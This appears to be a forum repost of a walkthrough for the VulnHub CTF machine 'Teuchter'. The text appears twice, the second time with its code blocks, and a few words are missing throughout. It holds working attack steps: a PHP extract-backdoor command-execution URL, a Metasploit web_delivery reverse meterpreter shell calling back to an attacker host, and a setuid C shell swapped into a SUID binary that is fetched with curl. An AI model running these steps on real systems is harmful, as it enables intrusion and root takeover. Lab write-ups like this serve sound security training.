craaapman
Subscription Service Pro
2
MONTHS
2 2 MONTHS OF SERVICE
LEVEL 1
300 XP
This post is on the latest CTF challenge “Teuchter” presented by vulnhub for penetration practice and design by knightmare. This virtual machine is having intermediate to the medium difficulty level. One need to break into VM using the web application and from there escalate privileges to gain root access.
Download it from here:
Penetrating Methodologies
Lets Start!!!
Let’s start with getting to know the IP of VM (Here, I have it at 192.168.1.104 but you will have to find your own)
Now let’s move towards enumeration in context to identify running services and open of victim’s machine by using the most popular tool Nmap.
Knowing port 80 is open in the victim’s network I preferred to explore his IP in a browser. At first glance, we saw following web page. When couldn’t found something suspicious, so we try to check its source-code
Hmmm!! After exploring the source code page, you can analysis the “Green color text” sounds a little bit doubtful. Giving priority to
Also, consider hint given for some extension like .pht for PHP.
So I opened the URL
Then explored the URL
So without wasting time, we lunch directory brute-force attack on the following URL for identifying .php and .pht extension files.
And from its result, we find a phpinfo.pht file and explored it in the browser and it gives me an internal server error when I open it. So I search in Google phpinfo.php found this link: https://blog.sucuri.net/2014/02/php-backdoors-hidden-with-clever-use-of-extract-function.html
Thanks to Mr. Daniel B. Cid for sharing his experience because with help of above link we get the idea to exploit it. As the author has hidden the PHP extract backdoor inside the phpinfo.pht file and now whatever the attacker sends as “ctime” with “atime” as an argument it will be executed successfully.
As you can observe when we try to execute the system command “id” through the given below URL we got following result on the web page.
Let’s compromise the victim’s VM to get the meterpreter shell, therefore, we load the Metasploit framework and execute below commands.
Copy the highlighted text for malicious PHP code and Paste it inside the URL as an argument.
You will get the meterpreter session of victim’s machine in your Metasploit framework and after then finished the task by grabbing the flag.txt file. Further type following for extracting more information for post exploitation.
Here first I
Here I found two files semaphore and test and if you will notice at their permissions then you will realize that SUID bit enabled for semaphore and GUID bit is enabled for test.
Now let access proper tty shell of victim’s VM and enumerate furthermore inside it.
Since the python 3 is already running, therefore, we execute the following command for transferring file.
When we explored the promisedyouamiracle.jpg image in the browser we got the following photo.
With help of exiftool, we try to extract metadata from inside this image and luckily found the bas64 encoded text.
With the help of the following command, we try to decode the text and got “gemini” which could be a possible password.
Let try to login by using gemini as a password for user: proclaimers because it holds two important files. Execute the following commands and extract the information.
Oh Great!! As declared above SUID bit enabled for the
Awesome, I got a script at this path /usr/local/bin/numpties.sh; let’s open it with cat command.
After reading it, I conclude that
No wonder, if I replace the original semaphore by the fake semaphore file then our fake file will get SUID permission. So in our local, we write a C-program to get bash shell and compile it.
Since we have compiled file semaphores and also running python server, therefore, let’s download our fake semaphore at the place of original semaphores. Thus first I removed original semaphores and download compiled file in the same directory.
After sometime when I checked the permission for the new semaphore I found the SUID bit was on. At that moment you should run the script which will give root terminal after getting executed and then look for flag inside /root directory.
This was not actual flag let’s try to get the original flag
So on………… and at last you will get /ariston which is holding a zip file “TeuchterESX.zip”.
Again run the following command in the current directory to transfer zip file.
Now download TeuchterESX.zip file in local machine and unzip it.
We got a vmdk file and further I run following command to the list of present drive for mounting disk image.
Here we saw /dev/sdb1 which looks good mounting disk image thus I install the vmfs-tools package.
So we have used vmfs-fuse to mount the drive and execute the following commands:
In this text messages the author had given hint to check ISO for getting the password which is related to TV advert and it’s of 25 characters.
So we mount the new folder /redkola.iso where we found an image file
Further, we opened the image “glass_ch.jpg” and it was a picture of
Taking help of above hint and image I search Irn-bru-wiki and got this link https://en.wikipedia.org/wiki/Irn-Bru
And after spending a long time over wiki I got 25 characters in ‘madeinscotlandfromgirders’, which was Irn-Bru advertising slogan and tried it as the passphrase.
We entered the above passphrase and extracted the text file on the desktop.
Congrats!! Finally, we got the final flag.txt
Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here
Download it from here:
Loading…
www.vulnhub.com
Penetrating Methodologies
- Network Scanning (netdiscover, Nmap)
- Abusing HTTP service for PHP extract backdoor
- Compromise victim’s (Metasploit)
- SUID Privilege escalation
- Steganography for original flag.txt
Lets Start!!!
Let’s start with getting to know the IP of VM (Here, I have it at 192.168.1.104 but you will have to find your own)
Code:
netdiscoverNow let’s move towards enumeration in context to identify running services and open of victim’s machine by using the most popular tool Nmap.
Code:
nmap -A 192.168.1.104Knowing port 80 is open in the victim’s network I preferred to explore his IP in a browser. At first glance, we saw following web page. When couldn’t found something suspicious, so we try to check its source-code
Hmmm!! After exploring the source code page, you can analysis the “Green color text” sounds a little bit doubtful. Giving priority to
and
we have considered them as the subjective web directories and then try to explore it in the web browser.
Also, consider hint given for some extension like .pht for PHP.
So I opened the URL
but couldn’t get anything neither from its web page nor from its source code.
Then explored the URL
and it put-up following web page in front of us and at looking at its page source code we notice something like
So without wasting time, we lunch directory brute-force attack on the following URL for identifying .php and .pht extension files.
Code:
dirb http://192.168.1.104/flicks/ -X .php,.phtAnd from its result, we find a phpinfo.pht file and explored it in the browser and it gives me an internal server error when I open it. So I search in Google phpinfo.php found this link: https://blog.sucuri.net/2014/02/php-backdoors-hidden-with-clever-use-of-extract-function.html
Thanks to Mr. Daniel B. Cid for sharing his experience because with help of above link we get the idea to exploit it. As the author has hidden the PHP extract backdoor inside the phpinfo.pht file and now whatever the attacker sends as “ctime” with “atime” as an argument it will be executed successfully.
As you can observe when we try to execute the system command “id” through the given below URL we got following result on the web page.
Code:
192.168.1.104/flicks/phpinfo.php?ctime=system&atime=idLet’s compromise the victim’s VM to get the meterpreter shell, therefore, we load the Metasploit framework and execute below commands.
Code:
use exploit/multi/script/web_delivery
msf exploit(multi/script/web_delivery) > set target 1
msf exploit(multi/script/web_delivery) > set payload php/meterpreter/reverse_tcp
msf exploit(multi/script/web_delivery) > set lhost 192.168.1.107
msf exploit(multi/script/web_delivery) > exploitCopy the highlighted text for malicious PHP code and Paste it inside the URL as an argument.
You will get the meterpreter session of victim’s machine in your Metasploit framework and after then finished the task by grabbing the flag.txt file. Further type following for extracting more information for post exploitation.
Here first I
command to enumerate install kernel version but didn’t found any working exploit for this VM therefore then I decide to go with the manual approach for privilege escalation. Thus execute below commands:
Code:
cd /home
ls
cd proclaimers
ls
cd letterfromamerica
lsHere I found two files semaphore and test and if you will notice at their permissions then you will realize that SUID bit enabled for semaphore and GUID bit is enabled for test.
Now let access proper tty shell of victim’s VM and enumerate furthermore inside it.
Code:
shell
python3 -c 'import pty;pty.spawn("/bin/bash")'!! I got something suspicious file a
from inside
, and
image. And after reading the note of the login.txt file I decided to download jpg image in our local machine.
Since the python 3 is already running, therefore, we execute the following command for transferring file.
Code:
python3 -m http.server 8080When we explored the promisedyouamiracle.jpg image in the browser we got the following photo.
With help of exiftool, we try to extract metadata from inside this image and luckily found the bas64 encoded text.
Code:
exiftool promisedyouamiracle.jpgWith the help of the following command, we try to decode the text and got “gemini” which could be a possible password.
Code:
echo "Z2VtaW5pCg==" | base64 -dLet try to login by using gemini as a password for user: proclaimers because it holds two important files. Execute the following commands and extract the information.
Code:
su proclaimers
password: gemini
ls
cd proclaimers
ls
cd letterfromamerica
ls -alOh Great!! As declared above SUID bit enabled for the
and GUID bit enabled for the
, let’s use
to get everything related to
Code:
grep -R "semaphore" /usr/local 2>/dev/nullAwesome, I got a script at this path /usr/local/bin/numpties.sh; let’s open it with cat command.
Code:
cat /usr/local/bin/numpties.shAfter reading it, I conclude that
.
No wonder, if I replace the original semaphore by the fake semaphore file then our fake file will get SUID permission. So in our local, we write a C-program to get bash shell and compile it.
Code:
include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
Int main ()
{
setuid(geteuid ());
system("/bin/bash");
}
Code:
gcc shell.c -o semaphore
python -m SimpleHTTPServer 80Since we have compiled file semaphores and also running python server, therefore, let’s download our fake semaphore at the place of original semaphores. Thus first I removed original semaphores and download compiled file in the same directory.
Code:
rm -rf semaphore
curl -O http://192.168.1.107/semaphoreAfter sometime when I checked the permission for the new semaphore I found the SUID bit was on. At that moment you should run the script which will give root terminal after getting executed and then look for flag inside /root directory.
Code:
ls -la
./semaphore
cd /root
cat flag.txtThis was not actual flag let’s try to get the original flag
Code:
cd root
ls
re-record-not-fade-away
ls -al
cd on
ls
cd and
ls
cd onSo on………… and at last you will get /ariston which is holding a zip file “TeuchterESX.zip”.
Code:
cd aristonAgain run the following command in the current directory to transfer zip file.
Code:
python3 -m http.server 8080Now download TeuchterESX.zip file in local machine and unzip it.
Code:
wget http://192.168.1.103:8080/TeuchterESX.zip
unzip TeuchterESX.zip
password: TeuchterWe got a vmdk file and further I run following command to the list of present drive for mounting disk image.
Code:
fdisk -lHere we saw /dev/sdb1 which looks good mounting disk image thus I install the vmfs-tools package.
So we have used vmfs-fuse to mount the drive and execute the following commands:
Code:
mkdir Teuchter
vmfs-fuse /dev/sdb1 /root/Desktop/Teuchter/
cd Teuchter
ls
cat hint.txt
cd redkolaIn this text messages the author had given hint to check ISO for getting the password which is related to TV advert and it’s of 25 characters.
So we mount the new folder /redkola.iso where we found an image file
with help of the following command:
Code:
mount redkola.iso /root/Desktop/redkola
cd /root/Desktop/redkola
lsFurther, we opened the image “glass_ch.jpg” and it was a picture of
. Probably there could be chances of hidden text in this image, therefore, we tried steghide to extract out hidden text but when I execute the following command it asks to enter some
which we don’t know yet and it should above said 25 characters which we need to be found.
Code:
steghide extract -sf glass_ch.jpg -xf /root/Desktop/finalflag.txtTaking help of above hint and image I search Irn-bru-wiki and got this link https://en.wikipedia.org/wiki/Irn-Bru
And after spending a long time over wiki I got 25 characters in ‘madeinscotlandfromgirders’, which was Irn-Bru advertising slogan and tried it as the passphrase.
We entered the above passphrase and extracted the text file on the desktop.
Congrats!! Finally, we got the final flag.txt
Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here